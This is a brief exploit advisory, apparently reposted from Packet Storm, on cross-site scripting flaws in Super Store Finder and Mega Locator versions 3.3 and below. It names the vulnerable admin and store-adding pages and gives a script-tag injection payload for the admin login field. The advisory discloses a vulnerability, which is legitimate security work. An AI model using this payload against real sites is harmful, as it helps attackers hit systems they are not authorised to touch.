Super Store Finder versions 3.3 and below suffer from a cross site scripting vulnerability.
cba764792c05d1bb20116171bb2b53bd7e49b7fbf46b17d19f4146c567e568f9######################################################################################
# Exploit type : XSS INJECTION
# Exploit title : Super Store Finder Add location XSS Injection
# Descriptions : XSS injection from adding store
# and reflected XSS in SQL error login page
# PHP Script affected : Super Store Finder | Mega Locator
# Plugin URI : http://www.superstorefinder.net/
# Version : 3.3 and Below
# Exploit Author : Eagle Eye
# Plugin Author : Joe Iz
# Tested On : Windows
# Date : 11/14/2020
# Vuln Page : <website>/superstorefinder/admin/
# <website>/superstorefinder/newstore.php
# <website>/megalocator/admin/
# Payload(admin login) : ' <script>alert(1);</script>
#######################################################################################
<https://www.avast.com/sig-email?utm_medium=email&utm_source=link&utm_campaign=sig-email&utm_content=webmail>
Virus-free.
www.avast.com
<https://www.avast.com/sig-email?utm_medium=email&utm_source=link&utm_campaign=sig-email&utm_content=webmail>
<#DAB4FAD8-2DD7-40BB-A1B8-4E2AA1F9FDF2>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed